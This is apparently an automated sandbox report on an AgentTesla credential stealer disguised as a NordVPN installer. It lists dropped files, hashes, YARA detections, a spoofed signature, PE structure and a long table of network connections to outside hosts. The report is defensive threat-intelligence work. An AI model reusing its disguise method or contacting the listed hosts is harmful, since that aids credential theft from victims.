Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="481619" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Roaming\ScreenShot\screen.jpeg

Download File

Process:	C:\Users\user\Desktop\NordVPNInstaller.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	modified
Size (bytes):	58925
Entropy (8bit):	7.602686686719732
Encrypted:	false
SSDEEP:	1536:bzchHz2M8nX941zzBZQ0ceO8Y/riIb2us04u:fchHzh8SZNZQlX/GIb2us0d
MD5:	30A9572A421C6FF4F0CC37FB3E299492
SHA1:	F3ADA0FF289D5C3374345C31CB1FAA64CC4FBC0F
SHA-256:	2BFC0E92BE7FCDA45193CEA20E64DEC2E967E347FEE732ED4E9E1D5BA524BCA5
SHA-512:	130E8EBF796B3F6090EB632B9944328A21A68CE3875FD891ECF8E0D5BD98430257A493A7F5C343956662FBE2BADCB3B4A65E688A1E0ED834991A9338E410CB19
Malicious:	false
Reputation:	low
Preview:	......JFIF.....`.`.....C................(.....1#%.(:3=<9387@H\N@DWE78PmQW_bghg>Mqypdx\egc...C......./../cB8Bcccccccccccccccccccccccccccccccccccccccccccccccccc..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...ZJ.....;i$@....1...%...}.....R+..iN["...-.t.=.....{...,......E..^e:Ia......H..5.j..2i..(.AE.P.Ek..+.( ...2.....k...?....u.J...(.....^........0.....F}kJX.U.T......W....Q[...Q@.E-lhzm..R..e..i.EJ..y..N..bcQ]g.#.?.......Q.........Z...O.:...._.......Q%kM....NI.........h.W..V..HJ)h.LD..(.....Gs.E..6.Fq.............k..%S.+Ge.$..3.../.=7.}.........p4.......

C:\Users\user\AppData\Roaming\bbb\bbb.exe

Download File

Process:	C:\Users\user\Desktop\NordVPNInstaller.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	301120
Entropy (8bit):	4.970710931833033
Encrypted:	false
SSDEEP:	3072:odUSJ2RFEnyHBIMUOY9IkH+LGP34oGKerVUzeeDXbwa21DU9ua/aHyvZRSd2iGrg:dSoSGjUMebwvONNAAw
MD5:	59ACD8C97C40ED66CF5FCD0E0C010C6A
SHA1:	D3A5CB8DBA49D929AFE3B05687A3286B5DB0B7C3
SHA-256:	E4C05C4D5182791CE9F92E0C7DA446C15BF65AC47E57E183D2FE83CC3C33C705
SHA-512:	B79C2D092B8C338FA6A87F29E560A3C0F15FC6D4795AA347C69D09F28A2293E15CF27549E0AFDDC8F0055DAC0FAA76C14B4F082D577012F9129E261B5AA3666D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, Author: Joe Security Rule: AgentTesla_1, Description: AgentTesla Payload, Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, Author: kevoreilly Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, Author: ditekSHen Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, Author: ditekSHen Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................>.... ........@.. ..............................H.....@.....................................W....................l..@,........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc...............j..............@..B................ .......H...........P............k...y...........................................0...........r...p.rk..p.r...p... ......r...p..(......o......(.....o.......(...........s...........[o......s.........o...........o........s...........s.........i...............io........o.......o.....(.........o..........+......2%(......(........v.(.......2%(......(..........v.(.......2%(......(...........s.........s.........s.........s............2%(......(.........0..!.......~....o....*...2%(...

C:\Users\user\AppData\Roaming\bbb\bbb.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\NordVPNInstaller.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.46294546648517
Encrypted:	false
SSDEEP:	6144:9IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN2dwBCswSbn:uXD94+WlLZMM6YFHg+n
MD5:	229AE0A1AEF481B895DB78811A45B3CD
SHA1:	EAB9743C0D61281AA0241E1AC6B40E295C6FF5DC
SHA-256:	495B6F87A889386B2BF5C3D00BBF05EBFA0891C05296BFF134B56E7886E07E4F
SHA-512:	70865A1241B31B2814CE3BF904EE5261519434EE69940925458ECD8971AE58249ACFF93A48586A98CD42D6AEF2F326395A0FFBF1EA8979B028AA4525FBF162C0
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmZ.d.................................................................................................................................................................................................................................................................................................................................................U.r1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.970710931833033
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	NordVPNInstaller.exe
File size:	301'120 bytes
MD5:	59acd8c97c40ed66cf5fcd0e0c010c6a
SHA1:	d3a5cb8dba49d929afe3b05687a3286b5db0b7c3
SHA256:	e4c05c4d5182791ce9f92e0c7da446c15bf65ac47e57e183d2fe83cc3c33c705
SHA512:	b79c2d092b8c338fa6a87f29e560a3c0f15fc6d4795aa347c69d09f28a2293e15cf27549e0afddc8f0055dac0faa76c14b4f082d577012f9129e261b5aa3666d
SSDEEP:	3072:odUSJ2RFEnyHBIMUOY9IkH+LGP34oGKerVUzeeDXbwa21DU9ua/aHyvZRSd2iGrg:dSoSGjUMebwvONNAAw
TLSH:	0954D5087FE44B05FDBE6B3E4C7049596671AC827922DBCD4BC174F91B2374089AAB63
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................>.... ........@.. ..............................H.....@................................

File Icon


Icon Hash:	e8d2ac4e8f93ab00

Static PE Info

General

Entrypoint:	0x42f23e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66D4C11E [Sun Sep 1 19:31:42 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	14/05/2021 21:05:30 14/05/2024 21:05:30
Subject Chain	E=admin@nordvpn.com, CN=nordvpn s.a., O=nordvpn s.a., STREET="PH F&F Tower, 50th Street & 56th Street, Suite 32-D", L=Panama City, S=Panama, C=PA, OID.1.3.6.1.4.1.311.60.2.1.3=PA, SERIALNUMBER=155694934, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	148F6FEBE46A0372B80A85F08662B606
Thumbprint SHA-1:	47B77B8D91FE90DEC43731694F8D2E561DBEED08
Thumbprint SHA-256:	8B0D3ED267AF11946A06B17F29D17D81F4E4F7045AFF153AB4F6DC8940E913AC
Serial:	5DB3AB95B89D4AE090608B4A

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2f1e4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x30000	0x193b9	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x46c00	0x2c40
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x2d244	0x2d400	ac13a300b4fc01391eaf7ff8bf061708	False	0.3804439312845304	data	5.538973133185875	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x30000	0x193b9	0x19400	7a121e6b6cbbd8b83497cbf3a476fcd9	False	0.08946666150990099	data	2.488688840176633	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4a000	0xc	0x200	e2e07d9ad253287d70cb073e1d068bb7	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x304c8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.25354609929078015
RT_ICON	0x30930	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.149859287054409
RT_ICON	0x319d8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.07681861124232404
RT_ICON	0x35c00	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.04230746480539453
RT_STRING	0x46428	0x360	data			0.34375
RT_STRING	0x46788	0x260	data			0.3256578947368421
RT_STRING	0x469e8	0x45c	data			0.4068100358422939
RT_STRING	0x46e44	0x40c	data			0.3754826254826255
RT_STRING	0x47250	0x2d4	data			0.39226519337016574
RT_STRING	0x47524	0xb8	data			0.6467391304347826
RT_STRING	0x475dc	0x9c	data			0.6410256410256411
RT_STRING	0x47678	0x374	data			0.4230769230769231
RT_STRING	0x479ec	0x398	data			0.3358695652173913
RT_STRING	0x47d84	0x368	data			0.3795871559633027
RT_STRING	0x480ec	0x2a4	data			0.4275147928994083
RT_RCDATA	0x48390	0x10	data			1.5
RT_RCDATA	0x483a0	0x2c4	data			0.6384180790960452
RT_RCDATA	0x48664	0x2c	data			1.2045454545454546
RT_GROUP_ICON	0x48690	0x3e	data	English	United States	0.7741935483870968
RT_VERSION	0x486d0	0x584	data	English	United States	0.25991501416430596
RT_MANIFEST	0x48c54	0x765	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.39091389329107235

Imports

DLL	Import
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 1, 2024 21:54:54.986745119 CEST	49733	80	192.168.2.4	132.226.247.73
Sep 1, 2024 21:54:54.994338989 CEST	80	49733	132.226.247.73	192.168.2.4
Sep 1, 2024 21:54:54.994434118 CEST	49733	80	192.168.2.4	132.226.247.73
Sep 1, 2024 21:54:54.994596958 CEST	49733	80	192.168.2.4	132.226.247.73
Sep 1, 2024 21:54:54.999331951 CEST	80	49733	132.226.247.73	192.168.2.4
Sep 1, 2024 21:54:55.660928011 CEST	80	49733	132.226.247.73	192.168.2.4
Sep 1, 2024 21:54:55.716352940 CEST	49733	80	192.168.2.4	132.226.247.73
Sep 1, 2024 21:55:11.173650026 CEST	49734	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:11.173702002 CEST	443	49734	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:11.173763990 CEST	49734	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:11.205313921 CEST	49734	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:11.205331087 CEST	443	49734	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:11.665945053 CEST	443	49734	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:11.666009903 CEST	49734	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:11.672053099 CEST	49734	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:11.672065973 CEST	443	49734	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:11.672338963 CEST	443	49734	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:11.690828085 CEST	49734	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:11.736505985 CEST	443	49734	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:11.788650036 CEST	443	49734	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:11.790008068 CEST	49734	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:11.790019035 CEST	443	49734	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:11.917308092 CEST	443	49734	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:11.917349100 CEST	443	49734	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:11.917392015 CEST	49734	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:11.919718027 CEST	49734	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:11.922499895 CEST	49736	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:11.922532082 CEST	443	49736	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:11.922596931 CEST	49736	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:11.922826052 CEST	49736	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:11.922843933 CEST	443	49736	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:12.376097918 CEST	443	49736	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:12.378097057 CEST	49736	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:12.378118992 CEST	443	49736	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:12.510417938 CEST	443	49736	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:12.510745049 CEST	49736	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:12.510757923 CEST	443	49736	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:12.648531914 CEST	443	49736	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:12.648580074 CEST	443	49736	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:12.648880959 CEST	49736	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:12.651530027 CEST	49736	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:12.685170889 CEST	49738	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:12.685209990 CEST	443	49738	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:12.685430050 CEST	49738	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:12.685663939 CEST	49738	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:12.685679913 CEST	443	49738	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:13.138273001 CEST	443	49738	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:13.140254021 CEST	49738	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:13.140285969 CEST	443	49738	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:13.272378922 CEST	443	49738	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:13.272587061 CEST	49738	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:13.272603989 CEST	443	49738	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:13.387074947 CEST	443	49738	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:13.387123108 CEST	443	49738	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:13.387362957 CEST	49738	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:13.387460947 CEST	49738	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:13.630556107 CEST	49741	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:13.630594969 CEST	443	49741	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:13.630743980 CEST	49741	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:13.631218910 CEST	49741	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:13.631234884 CEST	443	49741	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:14.081336975 CEST	443	49741	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:14.092052937 CEST	49741	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:14.092077017 CEST	443	49741	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:14.217065096 CEST	443	49741	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:14.217276096 CEST	49741	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:14.217293024 CEST	443	49741	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:14.356250048 CEST	443	49741	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:14.356291056 CEST	443	49741	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:14.356338978 CEST	49741	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:14.356798887 CEST	49741	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:23.965331078 CEST	49744	80	192.168.2.4	132.226.247.73
Sep 1, 2024 21:55:23.970848083 CEST	80	49744	132.226.247.73	192.168.2.4
Sep 1, 2024 21:55:23.970947981 CEST	49744	80	192.168.2.4	132.226.247.73
Sep 1, 2024 21:55:23.971085072 CEST	49744	80	192.168.2.4	132.226.247.73
Sep 1, 2024 21:55:23.975883007 CEST	80	49744	132.226.247.73	192.168.2.4
Sep 1, 2024 21:55:25.624087095 CEST	80	49744	132.226.247.73	192.168.2.4
Sep 1, 2024 21:55:25.669281960 CEST	49744	80	192.168.2.4	132.226.247.73
Sep 1, 2024 21:55:32.315872908 CEST	49745	80	192.168.2.4	132.226.247.73
Sep 1, 2024 21:55:32.321181059 CEST	80	49745	132.226.247.73	192.168.2.4
Sep 1, 2024 21:55:32.321268082 CEST	49745	80	192.168.2.4	132.226.247.73
Sep 1, 2024 21:55:32.321491957 CEST	49745	80	192.168.2.4	132.226.247.73
Sep 1, 2024 21:55:32.326467991 CEST	80	49745	132.226.247.73	192.168.2.4
Sep 1, 2024 21:55:32.976727009 CEST	80	49745	132.226.247.73	192.168.2.4
Sep 1, 2024 21:55:33.028671980 CEST	49745	80	192.168.2.4	132.226.247.73
Sep 1, 2024 21:55:35.795243979 CEST	49733	80	192.168.2.4	132.226.247.73
Sep 1, 2024 21:55:35.802222013 CEST	80	49733	132.226.247.73	192.168.2.4
Sep 1, 2024 21:55:35.802289963 CEST	49733	80	192.168.2.4	132.226.247.73
Sep 1, 2024 21:55:40.882674932 CEST	49746	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:40.882707119 CEST	443	49746	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:40.882797003 CEST	49746	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:40.886825085 CEST	49746	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:40.886845112 CEST	443	49746	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:41.299948931 CEST	49745	80	192.168.2.4	132.226.247.73
Sep 1, 2024 21:55:41.339566946 CEST	443	49746	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:41.339641094 CEST	49746	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:41.344182968 CEST	49746	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:41.344191074 CEST	443	49746	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:41.344430923 CEST	443	49746	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:41.351655960 CEST	49746	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:41.396498919 CEST	443	49746	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:41.476018906 CEST	443	49746	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:41.476301908 CEST	49746	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:41.476314068 CEST	443	49746	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:41.615799904 CEST	443	49746	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:41.615853071 CEST	443	49746	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:41.615948915 CEST	49746	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:41.616318941 CEST	49746	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:41.617976904 CEST	49747	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:41.618017912 CEST	443	49747	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:41.618078947 CEST	49747	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:41.618315935 CEST	49747	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:41.618330956 CEST	443	49747	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:42.061441898 CEST	443	49747	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:42.067853928 CEST	49747	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:42.067889929 CEST	443	49747	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:42.195456982 CEST	443	49747	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:42.196129084 CEST	49747	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:42.196149111 CEST	443	49747	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:42.334053993 CEST	443	49747	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:42.334103107 CEST	443	49747	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:42.334274054 CEST	49747	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:42.334487915 CEST	49747	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:42.339571953 CEST	49748	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:42.339596987 CEST	443	49748	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:42.339675903 CEST	49748	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:42.340157032 CEST	49748	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:42.340169907 CEST	443	49748	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:42.866050005 CEST	443	49748	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:42.867582083 CEST	49748	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:42.867600918 CEST	443	49748	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:42.991425991 CEST	443	49748	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:42.991703033 CEST	49748	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:42.991710901 CEST	443	49748	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:43.118051052 CEST	443	49748	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:43.118093967 CEST	443	49748	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:43.118331909 CEST	49748	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:43.118540049 CEST	49748	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:43.288752079 CEST	49749	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:43.288795948 CEST	443	49749	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:43.288866997 CEST	49749	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:43.289087057 CEST	49749	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:43.289103031 CEST	443	49749	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:43.730859041 CEST	443	49749	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:43.734901905 CEST	49749	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:55:43.734934092 CEST	443	49749	198.185.159.177	192.168.2.4
Sep 1, 2024 21:55:43.852507114 CEST	443	49749	198.185.159.177	192.168.2.4
